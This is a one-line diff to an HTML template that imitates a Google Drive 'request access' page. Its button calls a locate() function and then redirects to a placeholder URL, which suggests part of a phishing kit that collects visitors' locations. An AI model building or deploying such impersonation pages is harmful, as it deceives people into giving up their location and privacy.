--- a/template/gdrive/index_temp.html
+++ b/template/gdrive/index_temp.html
@@ -32,7 +32,7 @@
 					<p>Want in? Ask for access, or switch to an account with permission.</p>
 				</div>
 				<p id="buttons" style="padding-top: 10px">
-					<button id="requestButton" style="font-weight:bold" class="jfk-button jfk-button-action" onclick="locate(function(){window.location='REDIRECT_URL';}, function(){$('#change').html('Failed');});">Request access</button>
+					<button id="requestButton" style="font-weight:bold" class="jfk-button jfk-button-action" onclick="locate(function(){window.location=REDIRECT_URL;}, function(){$('#change').html('Failed');});">Request access</button>
 				</p>
 			</div>
 		</div>
